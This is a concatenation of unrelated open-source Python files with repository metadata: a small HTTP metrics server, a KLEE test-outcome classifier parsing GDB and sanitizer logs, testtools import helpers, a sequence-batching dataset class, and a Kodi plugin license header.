but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU Affero General Public License for more details.

You should have received a copy of the GNU Affero General Public License
along with this program.  If not, see: <http://www.gnu.org/licenses/>
"""
##############################################################################
# NOTE: This module is Python 2 only (BaseHTTPServer, urllib.urlopen,
# xrange, old-style except clauses).
import getopt
import os
import random
import re
import select
import socket
import struct
import sys
import threading
import time
import traceback
import urllib
import BaseHTTPServer
try:
    from urlparse import parse_qs, urlparse
except Exception, e:
    from cgi import parse_qs
    from urlparse import urlparse


class YamonRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Serves the owning YamonD's metrics over HTTP (see handle_path)."""

    def do_yamon_vars(self):
        # Dump all counters and lists as plain text.
        self.send_response(200)
        self.send_header('Content-Type', 'text/plain')
        self.send_header('Cache-Control', 'no-cache')
        self.end_headers()
        self.wfile.write(self.server.yamond.render_vars_text())

    def do_heapy(self):
        # Heap profile via guppy; imported lazily so guppy stays optional.
        from guppy import hpy
        self.send_response(200)
        self.send_header('Content-Type', 'text/plain')
        self.send_header('Cache-Control', 'no-cache')
        self.end_headers()
        self.wfile.write(hpy().heap())

    def do_404(self):
        self.send_response(404)
        self.send_header('Content-Type', 'text/html')
        self.end_headers()
        self.wfile.write('<h1>404: What? Where? Cannot find it!</h1>')

    def do_root(self):
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.end_headers()
        self.wfile.write('<h1>Hello!</h1>')

    def handle_path(self, path, query):
        # Minimal router for the few supported URLs.
        if path == '/vars.txt':
            self.do_yamon_vars()
        elif path == '/heap.txt':
            self.do_heapy()
        elif path == '/':
            self.do_root()
        else:
            self.do_404()

    def do_GET(self):
        (scheme, netloc, path, params, query, frag) = urlparse(self.path)
        qs = parse_qs(query)
        return self.handle_path(path, query)


class YamonHttpServer(BaseHTTPServer.HTTPServer):
    """HTTPServer that keeps a back-reference to its owning YamonD."""

    def __init__(self, yamond, handler):
        BaseHTTPServer.HTTPServer.__init__(self, yamond.sspec, handler)
        self.yamond = yamond


class YamonD(threading.Thread):
    """Handle HTTP in a separate thread."""

    def __init__(self, sspec,
                 server=YamonHttpServer,
                 handler=YamonRequestHandler):
        threading.Thread.__init__(self)
        self.lock = threading.Lock()
        self.server = server
        self.handler = handler
        self.sspec = sspec       # (host, port); replaced by the bound address in run()
        self.httpd = None
        self.running = False
        self.values = {}         # scalar metrics, name -> value
        self.lists = {}          # ring buffers, name -> [size, next index, items]
        self.views = {}          # named (values, lists) snapshots for render_vars_text

    def vmax(self, var, value):
        # Raise var to value if value is larger.
        # NOTE(review): raises KeyError if var was never vset() — confirm
        # callers always initialize the variable first.
        try:
            self.lock.acquire()
            if value > self.values[var]:
                self.values[var] = value
        finally:
            self.lock.release()

    def vscale(self, var, ratio, add=0):
        # Multiply var by ratio, then add `add` (creates var at 0 if absent).
        try:
            self.lock.acquire()
            if var not in self.values:
                self.values[var] = 0
            self.values[var] *= ratio
            self.values[var] += add
        finally:
            self.lock.release()

    def vset(self, var, value):
        # Set var unconditionally.
        try:
            self.lock.acquire()
            self.values[var] = value
        finally:
            self.lock.release()

    def vadd(self, var, value, wrap=None):
        # Increment var, optionally wrapping around at `wrap`.
        try:
            self.lock.acquire()
            if var not in self.values:
                self.values[var] = 0
            self.values[var] += value
            if wrap is not None and self.values[var] >= wrap:
                self.values[var] -= wrap
        finally:
            self.lock.release()

    def vmin(self, var, value):
        # Lower var to value if value is smaller.
        # NOTE(review): like vmax, assumes var already exists.
        try:
            self.lock.acquire()
            if value < self.values[var]:
                self.values[var] = value
        finally:
            self.lock.release()

    def vdel(self, var):
        # Remove var if present.
        try:
            self.lock.acquire()
            if var in self.values:
                del self.values[var]
        finally:
            self.lock.release()

    def lcreate(self, listn, elems):
        # Create a fixed-size ring buffer of `elems` slots (initially '').
        try:
            self.lock.acquire()
            self.lists[listn] = [elems, 0, ['' for x in xrange(0, elems)]]
        finally:
            self.lock.release()

    def ladd(self, listn, value):
        # Append value to the ring buffer, overwriting the oldest slot.
        try:
            self.lock.acquire()
            lst = self.lists[listn]
            lst[2][lst[1]] = value
            lst[1] += 1
            lst[1] %= lst[0]
        finally:
            self.lock.release()

    def render_vars_text(self, view=None):
        """Render all metrics (or a named view) as sorted 'name: value' lines."""
        if view:
            if view == 'heapy':
                from guppy import hpy
                return hpy().heap()
            else:
                values, lists = self.views[view]
        else:
            values, lists = self.values, self.lists

        data = []
        for var in values:
            data.append('%s: %s\n' % (var, values[var]))
        for lname in lists:
            (elems, offset, lst) = lists[lname]
            # Rotate so the oldest entry comes first.
            l = lst[offset:]
            l.extend(lst[:offset])
            data.append('%s: %s\n' % (lname, ' '.join(['%s' % (x, ) for x in l])))
        data.sort()
        return ''.join(data)

    def quit(self):
        # Wake the blocking handle_request() in run() with a dummy request
        # so the serve loop notices running=False and exits.
        if self.httpd:
            self.running = False
            urllib.urlopen('http://%s:%s/exiting/' % self.sspec,
                           proxies={}).readlines()

    def run(self):
        # Bind the server (resolving port 0 to the actual port) and serve
        # one request at a time until quit() is called.
        self.httpd = self.server(self, self.handler)
        self.sspec = self.httpd.server_address
        self.running = True
        while self.running:
            self.httpd.handle_request()


if __name__ == '__main__':
    # Tiny smoke test: one scalar, one 2-slot ring buffer, then serve.
    yd = YamonD(('', 0))
    yd.vset('bjarni', 100)
    yd.lcreate('foo', 2)
    yd.ladd('foo', 1)
    yd.ladd('foo', 2)
    yd.ladd('foo', 3)
    yd.run()
delcypher/klee-runner
nativeanalysis/analyse.py
1
17995
# vim: set sw=4 ts=4 softtabstop=4 expandtab:
"""Classify the outcome of replaying a KLEE-generated test case natively.

Inspects a raw result-info dictionary (exit code, log file, invocation
info) and returns one of the outcome namedtuples below, parsing GDB,
UBSan or ASan output from the log where available.
"""
from collections import namedtuple
import logging
import pprint
import re

_logger = logging.getLogger(__name__)

# Possibe run outcomes
SuccessfulExecution = namedtuple("SuccessfulExecution", ["msg"])
ASanError = namedtuple("ASanError", ["msg", "type", "stack_trace"])
UBSanError = namedtuple("UBSanError", ["msg", "type", "stack_trace"])
AssertError = namedtuple("AssertError", ["msg", "condition", "stack_trace"])
AbortError = namedtuple("AbortError", ["msg", "stack_trace"])
ArithmeticError = namedtuple("ArithmeticError", ["msg", "stack_trace"])
UnknownError = namedtuple("UnknownError", ["msg", "raw_result_info"])
TimeoutError = namedtuple("TimeoutError", ["msg"])
OutOfMemoryError = namedtuple("OutOfMemoryError", ["msg"])
LibKleeRunTestError = namedtuple("LibKleeRunTestError", ["msg", "type"])

LIB_KLEE_RUN_TEST_ERROR_MSG_RE = re.compile(r"KLEE_RUN_TEST_ERROR: (.+)$")


def get_test_case_run_outcome(r):
    """
    Get an outcome for a run of a test case

    `r` a raw result info dictionary

    Returns one of the outcome namedtuples defined above.  Checks are
    ordered: timeout, OOM, success, libkleeruntest error, gdb-attached
    analysis, bare assert/abort (SIGABRT), SIGFPE, then UBSan/ASan replay
    builds; anything else is UnknownError.
    """
    assert isinstance(r, dict) # FIXME: Don't use raw form
    _logger.debug('Analysing:\n{}'.format(pprint.pformat(r)))
    invocation_info = r['invocation_info']
    if r['backend_timeout']:
        return TimeoutError(msg='Timeout hit running "{}" with "{}"'.format(
            invocation_info['program'], invocation_info['ktest_file']))
    if r['out_of_memory']:
        return OutOfMemoryError(msg='Memory limit hit running "{}" with "{}"'.format(
            invocation_info['program'], invocation_info['ktest_file']))
    if r['exit_code'] == 0:
        return SuccessfulExecution(msg='')

    # Look for libkleeruntest errors
    if r['exit_code'] == 1:
        log_file = r['log_file']
        _logger.debug('Opening log file "{}"'.format(log_file))
        with open(log_file, 'r') as f:
            for l in f:
                libkleeruntest_error_match = LIB_KLEE_RUN_TEST_ERROR_MSG_RE.search(l)
                if libkleeruntest_error_match:
                    type = libkleeruntest_error_match.group(1)
                    failure = LibKleeRunTestError(msg=l.strip(), type=type)
                    _logger.debug('Found LibkleeRuntest failure: {}'.format(failure))
                    return failure

    if invocation_info['attach_gdb']:
        return _get_outcome_attached_gdb(r)

    # Try for assert/abort without stacktrace (i.e. gdb was not attached)
    # Exit code -6 corresponds to death by SIGABRT.
    if r['exit_code'] == -6:
        # FIXME: This only works when using PythonPsUtil as the backend
        log_file = r['log_file']
        _logger.debug('Opening log file "{}"'.format(log_file))
        with open(log_file, 'r') as f:
            for l in f:
                assert_match = ASSERT_GDB_RE.search(l)
                if assert_match:
                    # Looks like an assertion failure
                    # FIXME: Parse the stack trace from gdb
                    condition = assert_match.group(1)
                    failure = AssertError(msg=l.strip(), condition=condition, stack_trace=None)
                    _logger.debug('Found assertion failure: {}'.format(failure))
                    return failure
        # Assume it was an abort
        failure = AbortError(msg="most likely an abort", stack_trace=None)
        _logger.debug('Found abort failure: {}'.format(failure))
        return failure

    # Try SIGFPE (exit code -8)
    if r['exit_code'] == -8:
        failure = ArithmeticError(msg="Found SIGFPE", stack_trace=None)
        _logger.debug('Found arithmetic failure: {}'.format(failure))
        return failure

    # Try ubsan/asan builds
    if 'misc' in invocation_info:
        if 'bug_replay_build_type' in invocation_info['misc']:
            bug_replay_build_type = invocation_info['misc']['bug_replay_build_type']
            if bug_replay_build_type == 'ubsan':
                return _get_outcome_ubsan(r)
            elif bug_replay_build_type == 'asan':
                return _get_outcome_asan(r)

    # Unknown
    return UnknownError(
        msg='Could not identify exit of program with non-zero exit code',
        raw_result_info=r)


ASSERT_GDB_RE = re.compile(r": Assertion `(.+)' failed.\s*$")
ABORT_GDB_RE = re.compile(r"Program received signal SIGABRT")
SIGFPE_GDB_RE = re.compile(r"Program received signal SIGFPE")

# \1 function name
# \2 library
GDB_IN_FROM_STACKFRAME = re.compile(r"#\d+\s+([A-Za-z0-9_]+)\s+\(.*\)\s+from\s+(.+)")
# \1 function name
# \2 source file
# \3 line number
GDB_IN_AT_STACKFRAME = re.compile(r"#\d+\s+([A-Za-z0-9_]+)\s+\(.*\)\s+at\s+(.+):(\d+)")


class StackFrame:
    """A single stack frame: either (fn_name, lib) for frames resolved to a
    shared library, or (fn_name, source_file, line_number) for frames with
    source information."""

    def __init__(self, fn_name, lib=None, source_file=None, line_number=None):
        assert isinstance(fn_name, str)
        assert len(fn_name) > 0
        if lib is not None:
            # Library frame: no source information expected.
            assert isinstance(lib, str)
            assert len(lib) > 0
        else:
            # Source frame: file and positive line number required.
            assert isinstance(source_file, str)
            assert len(source_file) > 0
            assert isinstance(line_number, int)
            assert line_number > 0
        self.fn_name = fn_name
        self.lib = lib
        self.source_file = source_file
        self.line_number = line_number

    def __str__(self):
        # NOTE(review): "StrackFrame" typo is preserved in the output string.
        msg = "StrackFrame(\"{}\", ".format(self.fn_name)
        if self.lib:
            msg += "lib=\"{}\")".format(self.lib)
        else:
            msg += "source_file=\"{}\", line_number={})".format(self.source_file, self.line_number)
        return msg

    def __repr__(self):
        return str(self)


def _parse_gdb_stacktrace(f):
    """Parse a GDB backtrace from file object `f` into a list of StackFrame.

    Scanning starts at the first line beginning with '#0' and stops at the
    first subsequent line not beginning with '#'.  Raises on unparseable
    frames.
    """
    in_stacktrace = False
    stacktrace = None
    for l in f:
        if l.startswith('#0'):
            in_stacktrace = True
            stacktrace = []
        if not in_stacktrace:
            continue
        if not l.startswith('#'):
            in_stacktrace = False
            break
        m = GDB_IN_FROM_STACKFRAME.match(l)
        if m:
            frame = StackFrame(fn_name=m.group(1), lib=m.group(2))
            stacktrace.append(frame)
            continue
        m = GDB_IN_AT_STACKFRAME.match(l)
        if m:
            frame = StackFrame(
                fn_name=m.group(1),
                lib=None,
                source_file=m.group(2),
                line_number=int(m.group(3))
            )
            stacktrace.append(frame)
            continue
        # Failed to parse stack frame
        _logger.error('Failed to parse "{}" from stacktrace'.format(l))
        raise Exception('Failed to parse stacktrace')
        return None
    _logger.debug('Got stacktrace:\n{}'.format(pprint.pformat(stacktrace)))
    return stacktrace


def _get_outcome_attached_gdb(r):
    """Classify a failed run whose log contains GDB output (gdb attached).

    Looks for an assertion message, then SIGABRT, then SIGFPE; raises on
    anything else.
    """
    assert isinstance(r, dict) # FIXME: Don't use raw form
    invocation_info = r['invocation_info']
    assert invocation_info['attach_gdb']
    assert r['exit_code'] != 0
    # For now assume we are looking for abort and assertion failures
    log_file = r['log_file']
    _logger.debug('Opening log file "{}"'.format(log_file))
    with open(log_file, 'r') as f:
        # Walk through the lines trying to find assertion message
        # e.g.
        # non_terminating_klee_bug.x86_64: /home/user/fp-bench/benchmarks/c/imperial/synthetic/non-terminating/non-terminating.c:65: main: Assertion `false' failed.
        for l in f:
            assert_match = ASSERT_GDB_RE.search(l)
            if assert_match:
                # Looks like an assertion failure. Here's an example trace
                # ```
                # sqrt_klee_bug.x86_64: /home/user/fp-bench/benchmarks/c/imperial/synthetic/sqrt/sqrt.c:80: main: Assertion `almost_equal(x, sqrt_x*sqrt_x)' failed.
                #
                # Program received signal SIGABRT, Aborted.
                # raise () from /usr/lib/libc.so.6
                # #0  raise () from /usr/lib/libc.so.6
                # #1  abort () from /usr/lib/libc.so.6
                # #2  __assert_fail_base () from /usr/lib/libc.so.6
                # #3  __assert_fail () from /usr/lib/libc.so.6
                # #4  main (argc=<optimized out>, argv=<optimized out>) at /home/user/fp-bench/benchmarks/c/imperial/synthetic/sqrt/sqrt.c:80
                # ```
                condition = assert_match.group(1)
                failure = AssertError(msg=l.strip(),
                                      condition=condition,
                                      stack_trace=_parse_gdb_stacktrace(f))
                _logger.debug('Found assertion failure: {}'.format(failure))
                return failure
            # NOTE: Be careful. assert failures call abort so we are assuming
            # that an assertion error message will come first
            abort_match = ABORT_GDB_RE.search(l)
            if abort_match:
                # Looks like abort() was called. Here's an example trace
                # ```
                # Program received signal SIGABRT, Aborted.
                # raise () from /usr/lib/libc.so.6
                # #0  raise () from /usr/lib/libc.so.6
                # #1  abort () from /usr/lib/libc.so.6
                # #2  __gmp_invalid_operation () at /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/invalid.c:82
                # #3  __gmpf_set_d (r=r@entry=, d=<optimized out>) at /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/mpf/set_d.c:45
                # #4  main (argc=<optimized out>, argv=<optimized out>) at /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/main.c:100
                # ```
                failure = AbortError(msg=l.strip(),
                                     stack_trace=_parse_gdb_stacktrace(f))
                _logger.debug('Found abort failure: {}'.format(failure))
                return failure
            sigfpe_match = SIGFPE_GDB_RE.search(l)
            if sigfpe_match:
                failure = ArithmeticError(msg=l.strip(),
                                          stack_trace=_parse_gdb_stacktrace(f))
                _logger.debug('Found abort failure: {}'.format(failure))
                return failure
    raise Exception('GDB: unhandled case')


# FIXME: The stacktrace for ASan and UBSan are the same
# we probably ought to use the same parser
UBSAN_START_STACKTRACE = re.compile(r"\s*#0")
UBSAN_FRAME_STACKTRACE = re.compile(r"\s*#\d+")
# \1 function name
# \2 source file
# \3 line number
UBSAN_FRAME_SOURCE_STACKTRACE = re.compile(r"^\s*#\d+\s+.+\s+in\s+([A-Za-z0-9_]+)\s+(.+):(\d+)")
# \1 function name
# \2 library
UBSAN_FRAME_LIB_STACKTRACE = re.compile(r"^\s*#\d+\s+.+\s+in\s+([A-Za-z0-9_]+)\s+\((.+)\+.+\)")


def _parse_ubsan_stacktrace(f):
    """Parse a UBSan runtime-error stacktrace from file object `f` into a
    list of StackFrame.  Example stacktrace:

    ```
    /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/errno.c:53:19: runtime error: division by zero
        #0 0x409a9c in __gmp_exception /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/errno.c:53
        #1 0x409aad in __gmp_sqrt_of_negative /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/errno.c:64
        #2 0x402364 in __gmpf_sqrt /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/gmp-6.1.1/mpf/sqrt.c:76
        #3 0x401eab in main /home/user/fp-bench/benchmarks/c/aachen/real/gmp/benchmarks/main.c:96
        #4 0x7fa818130290 in __libc_start_main (/usr/lib/libc.so.6+0x20290)
        #5 0x401ed9 in _start (/home/dsl11/dev/klee-afr/fp-bench/replay_ubsan_build/benchmarks/c/aachen/real/gmp/gmp_klee_inv_arg.x86_64+0x401ed9)
    ```
    """
    in_stacktrace = False
    stacktrace = None
    for l in f:
        _logger.debug('Examining "{}"'.format(l))
        if not in_stacktrace and UBSAN_START_STACKTRACE.match(l):
            in_stacktrace = True
            stacktrace = []
        if not in_stacktrace:
            _logger.debug('Not in stacktrace')
            continue
        if not UBSAN_FRAME_STACKTRACE.match(l):
            in_stacktrace = False
            break
        # Try the library form first, then the source-location form.
        m = UBSAN_FRAME_LIB_STACKTRACE.match(l)
        if m:
            frame = StackFrame(fn_name=m.group(1), lib=m.group(2))
            stacktrace.append(frame)
            continue
        m = UBSAN_FRAME_SOURCE_STACKTRACE.match(l)
        if m:
            frame = StackFrame(
                fn_name=m.group(1),
                lib=None,
                source_file=m.group(2),
                line_number=int(m.group(3))
            )
            stacktrace.append(frame)
            continue
        # Failed to parse stack frame
        _logger.error('Failed to parse "{}" from stacktrace'.format(l))
        raise Exception('Failed to parse stacktrace')
        return None
    _logger.debug('Got stacktrace:\n{}'.format(pprint.pformat(stacktrace)))
    return stacktrace


UBSAN_EXIT_CODE_RE = re.compile(r"exitcode=(\d+)")
UBSAN_RUNTIME_ERROR_RE = re.compile(r"runtime error: (.+)$")


def _get_outcome_ubsan(r):
    """Classify a failed run of a UBSan replay build by matching the exit
    code configured in UBSAN_OPTIONS and parsing the 'runtime error:'
    message plus stacktrace from the log."""
    assert isinstance(r, dict) # FIXME: Don't use raw form
    assert r['exit_code'] != 0
    invocation_info = r['invocation_info']

    # Parse out the excepted exit code
    expected_exit_code = None
    if 'UBSAN_OPTIONS' in invocation_info['environment_variables']:
        ubsan_options = invocation_info['environment_variables']['UBSAN_OPTIONS']
        exit_code_match = UBSAN_EXIT_CODE_RE.search(ubsan_options)
        if exit_code_match:
            expected_exit_code = int(exit_code_match.group(1))

    if expected_exit_code != r['exit_code']:
        raise Exception('UBSan: Unhandled case')

    # Look for runtime error
    log_file = r['log_file']
    _logger.debug('Opening log file "{}"'.format(log_file))
    with open(log_file, 'r') as f:
        for l in f:
            runtime_error_match = UBSAN_RUNTIME_ERROR_RE.search(l)
            if runtime_error_match:
                type = runtime_error_match.group(1)
                failure = UBSanError(msg=l.strip(),
                                     type=type,
                                     stack_trace=_parse_ubsan_stacktrace(f))
                _logger.debug('Found ubsan failure: {}'.format(failure))
                return failure
    raise Exception('UBSan: Unhandled case')


# FIXME: The stacktrace for ASan and UBSan are the same
# we probably ought to use the same parser
ASAN_START_STACKTRACE = re.compile(r"^\s*#0")
ASAN_FRAME_STACKTRACE = re.compile(r"^\s*#\d+")
# \1 function name
# \2 source file
# \3 line number
ASAN_FRAME_SOURCE_STACKTRACE = re.compile(r"^\s*#\d+\s+.+\s+in\s+([A-Za-z0-9_]+)\s+(.+):(\d+)")
# \1 function name
# \2 library
ASAN_FRAME_LIB_STACKTRACE = re.compile(r"^\s*#\d+\s+.+\s+in\s+([A-Za-z0-9_]+)\s+\((.+)\+.+\)")


def _parse_asan_stacktrace(f):
    """Parse an ASan error stacktrace from file object `f` into a list of
    StackFrame.  Example trace:

    ```
    =================================================================
    ==8223==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffdc76cf24 at pc 0x000000400c1d bp 0x7fffdc76cee0 sp 0x7fffdc76ced0
    READ of size 4 at 0x7fffdc76cf24 thread T0
        #0 0x400c1c in sum2 /home/user/fp-bench/benchmarks/c/imperial/synthetic/sum_is_commutative/sum_is_commutative.c:51
        #1 0x400c1c in main /home/user/fp-bench/benchmarks/c/imperial/synthetic/sum_is_commutative/sum_is_commutative.c:72
        #2 0x7f00accb1290 in __libc_start_main (/usr/lib/libc.so.6+0x20290)
        #3 0x400c89 in _start (/home/dsl11/dev/klee-afr/fp-bench/replay_asan_build/benchmarks/c/imperial/synthetic/sum_is_commutative_klee_float_bug.x86_64+0x400c89)

    Address 0x7fffdc76cf24 is located in stack of thread T0 at offset 52 in frame
        #0 0x4009bf in main /home/user/fp-bench/benchmarks/c/imperial/synthetic/sum_is_commutative/sum_is_commutative.c:59
    ```
    """
    in_stacktrace = False
    stacktrace = None
    for l in f:
        _logger.debug('Examining "{}"'.format(l))
        if not in_stacktrace and ASAN_START_STACKTRACE.match(l):
            in_stacktrace = True
            stacktrace = []
        if not in_stacktrace:
            _logger.debug('Not in stacktrace')
            continue
        if not ASAN_FRAME_STACKTRACE.match(l):
            in_stacktrace = False
            break
        # Try the library form first, then the source-location form.
        m = ASAN_FRAME_LIB_STACKTRACE.match(l)
        if m:
            frame = StackFrame(fn_name=m.group(1), lib=m.group(2))
            stacktrace.append(frame)
            continue
        m = ASAN_FRAME_SOURCE_STACKTRACE.match(l)
        if m:
            frame = StackFrame(
                fn_name=m.group(1),
                lib=None,
                source_file=m.group(2),
                line_number=int(m.group(3))
            )
            stacktrace.append(frame)
            continue
        # Failed to parse stack frame
        _logger.error('Failed to parse "{}" from stacktrace'.format(l))
        raise Exception('Failed to parse stacktrace')
        return None
    _logger.debug('Got stacktrace:\n{}'.format(pprint.pformat(stacktrace)))
    return stacktrace


ASAN_EXIT_CODE_RE = re.compile(r"exitcode=(\d+)")
ASAN_ERROR_MSG_RE = re.compile(r"AddressSanitizer: ([a-zA-z-]+)")


def _get_outcome_asan(r):
    """Classify a failed run of an ASan replay build by matching the exit
    code configured in ASAN_OPTIONS and parsing the 'AddressSanitizer:'
    error message plus stacktrace from the log."""
    assert isinstance(r, dict) # FIXME: Don't use raw form
    assert r['exit_code'] != 0
    invocation_info = r['invocation_info']

    # Parse out the excepted exit code
    expected_exit_code = None
    if 'ASAN_OPTIONS' in invocation_info['environment_variables']:
        asan_options = invocation_info['environment_variables']['ASAN_OPTIONS']
        exit_code_match = ASAN_EXIT_CODE_RE.search(asan_options)
        if exit_code_match:
            expected_exit_code = int(exit_code_match.group(1))

    if expected_exit_code != r['exit_code']:
        raise Exception('ASan: Unhandled case')

    # Look for ASan error message. E.g.
    # AddressSanitizer: stack-buffer-overflow on address
    log_file = r['log_file']
    _logger.debug('Opening log file "{}"'.format(log_file))
    with open(log_file, 'r') as f:
        for l in f:
            asan_error_msg_match = ASAN_ERROR_MSG_RE.search(l)
            if asan_error_msg_match:
                type = asan_error_msg_match.group(1)
                failure = ASanError(msg=l.strip(),
                                    type=type,
                                    stack_trace=_parse_asan_stacktrace(f))
                _logger.debug('Found asan failure: {}'.format(failure))
                return failure
    raise Exception('ASan: Unhandled case')
mit
framon/samba
lib/testtools/testtools/helpers.py
12
4116
# Copyright (c) 2010-2012 testtools developers. See LICENSE for details.

# All helpers defined here are public; the original __all__ omitted the
# dict/list utilities even though they are documented module API, so they
# are now exported too (a backward-compatible addition).
__all__ = [
    'dict_subtract',
    'filter_values',
    'list_subtract',
    'map_values',
    'safe_hasattr',
    'try_import',
    'try_imports',
    ]

import sys


def try_import(name, alternative=None, error_callback=None):
    """Attempt to import ``name``.  If it fails, return ``alternative``.

    When supporting multiple versions of Python or optional dependencies, it
    is useful to be able to try to import a module.

    :param name: The name of the object to import, e.g. ``os.path`` or
        ``os.path.join``.
    :param alternative: The value to return if no module can be imported.
        Defaults to None.
    :param error_callback: If non-None, a callable that is passed the
        ImportError when the module cannot be loaded.
    """
    # Walk the dotted name from the right, dropping trailing segments until
    # some prefix imports (handles names like "os.path.join" where the last
    # segment is an attribute, not a module).
    module_segments = name.split('.')
    last_error = None
    while module_segments:
        module_name = '.'.join(module_segments)
        try:
            module = __import__(module_name)
        except ImportError:
            last_error = sys.exc_info()[1]
            module_segments.pop()
            continue
        else:
            break
    else:
        # Nothing imported at all: report the most recent failure.
        if last_error is not None and error_callback is not None:
            error_callback(last_error)
        return alternative
    # __import__ returns the top-level package; descend to the requested
    # attribute, bailing out to ``alternative`` on the first missing segment.
    nonexistent = object()
    for segment in name.split('.')[1:]:
        module = getattr(module, segment, nonexistent)
        if module is nonexistent:
            if last_error is not None and error_callback is not None:
                error_callback(last_error)
            return alternative
    return module


_RAISE_EXCEPTION = object()


def try_imports(module_names, alternative=_RAISE_EXCEPTION,
                error_callback=None):
    """Attempt to import modules.

    Tries to import the first module in ``module_names``.  If it can be
    imported, we return it.  If not, we go on to the second module and try
    that.  The process continues until we run out of modules to try.  If none
    of the modules can be imported, either raise an exception or return the
    provided ``alternative`` value.

    :param module_names: A sequence of module names to try to import.
    :param alternative: The value to return if no module can be imported.
        If unspecified, we raise an ImportError.
    :param error_callback: If non-None, called with the ImportError for
        *each* module that fails to load.
    :raises ImportError: If none of the modules can be imported and no
        alternative value was specified.
    """
    module_names = list(module_names)
    for module_name in module_names:
        module = try_import(module_name, error_callback=error_callback)
        if module:
            return module
    if alternative is _RAISE_EXCEPTION:
        raise ImportError(
            "Could not import any of: %s" % ', '.join(module_names))
    return alternative


def safe_hasattr(obj, attr, _marker=object()):
    """Does 'obj' have an attribute 'attr'?

    Use this rather than built-in hasattr, as the built-in swallows
    exceptions in some versions of Python and behaves unpredictably with
    respect to properties.
    """
    return getattr(obj, attr, _marker) is not _marker


def map_values(function, dictionary):
    """Map ``function`` across the values of ``dictionary``.

    :return: A dict with the same keys as ``dictionary``, where the value
        of each key ``k`` is ``function(dictionary[k])``.
    """
    return dict((k, function(dictionary[k])) for k in dictionary)


def filter_values(function, dictionary):
    """Filter ``dictionary`` by its values using ``function``."""
    return dict((k, v) for k, v in dictionary.items() if function(v))


def dict_subtract(a, b):
    """Return the part of ``a`` that's not in ``b``."""
    return dict((k, a[k]) for k in set(a) - set(b))


def list_subtract(a, b):
    """Return a list ``a`` without the elements of ``b``.

    If a particular value is in ``a`` twice and in ``b`` once, then that
    value will appear once in the returned list.
    """
    a_only = list(a)
    for x in b:
        if x in a_only:
            a_only.remove(x)
    return a_only
gpl-3.0
dlacombejr/deepy
deepy/dataset/bunch_seq.py
5
2479
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging as loggers
logging = loggers.getLogger(__name__)

from . import MiniBatches

import numpy as np

from deepy.utils import global_rand, FakeGenerator


class BunchSequences(MiniBatches):
    """
    Arrange sequences in bunch mode.
    See http://mi.eng.cam.ac.uk/~xc257/papers/RNNLMTrain_Interspeech2014.pdf .
    """

    def __init__(self, dataset, batch_size=20, fragment_length=5):
        """Create a bunch-mode dataset wrapper.

        :param dataset: the underlying dataset (passed to MiniBatches).
        :param batch_size: number of parallel bunch stacks.
        :param fragment_length: length of each yielded fragment; must be >= 1.
        """
        super(BunchSequences, self).__init__(dataset, batch_size=batch_size)
        self.fragment_length = fragment_length
        if self.fragment_length < 1:
            # Fixed message: the check is `< 1`, i.e. a fragment_length of 1
            # is accepted, so "greater than 1" was wrong.
            # NOTE(review): ValueError would be the conventional exception
            # type here; SystemError is kept so any existing callers that
            # catch it keep working.
            raise SystemError("fragment_length must be at least 1")

    def _yield_data(self, subset):
        # Shuffle the sequences, then greedily deal each (x, y) pair onto
        # whichever of the `self.size` parallel "bunch" stacks is currently
        # shortest, so the stacks stay roughly balanced.
        subset = list(subset)
        global_rand.shuffle(subset)
        bunch_stack_x = [[] for _ in range(self.size)]
        bunch_stack_y = [[] for _ in range(self.size)]
        for x, y in subset:
            # Python 2: map() returns a list here, so .index() is valid.
            stack_lens = map(len, bunch_stack_x)
            shortest_i = stack_lens.index(min(stack_lens))
            bunch_stack_x[shortest_i].extend(x)
            bunch_stack_y[shortest_i].extend(y)
        self._pad_zeros(bunch_stack_x)
        self._pad_zeros(bunch_stack_y)
        pieces_x = self._cut_to_pieces(bunch_stack_x)
        pieces_y = self._cut_to_pieces(bunch_stack_y)
        logging.info("%d pieces this time" % int(float(len(bunch_stack_x[0])) / self.fragment_length))
        for piece in zip(pieces_x, pieces_y):
            yield piece

    def _train_set(self):
        if not self.origin.train_set():
            return None
        return self._yield_data(self.origin.train_set())

    def train_set(self):
        # FakeGenerator re-invokes _train_set on each iteration pass.
        return FakeGenerator(self, "_train_set")

    def train_size(self):
        # Counts pieces by exhausting the generator once.
        size = len([_ for _ in self.train_set()])
        return size

    def _cut_to_pieces(self, bunch_stack):
        """Yield (size, fragment_length) arrays sliced from the stacks.

        :type bunch_stack: list of list of int
        """
        stack_len = len(bunch_stack[0])
        for i in xrange(0, stack_len, self.fragment_length):
            yield np.array(map(lambda stack: stack[i: i + self.fragment_length], bunch_stack))

    def _pad_zeros(self, bunch_stack):
        """Truncate all stacks to the length of the shortest one.

        NOTE(review): despite the name, this no longer pads — the padding
        code below is commented out and the stacks are clipped instead.

        :type bunch_stack: list of list
        """
        min_len = min(map(len, bunch_stack))
        for i in range(len(bunch_stack)):
            bunch_stack[i] = bunch_stack[i][:min_len]
        # for stack in bunch_stack:
        #     for _ in range(max_len - len(stack)):
        #         stack.append(0)
mit
mrquim/mrquimrepo
repo/plugin.video.LiveTV/resources/lib/URLResolverMedia.py
4
22846
#!/usr/bin/python
# -*- coding: utf-8 -*-
#      Copyright 2015 xsteal
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

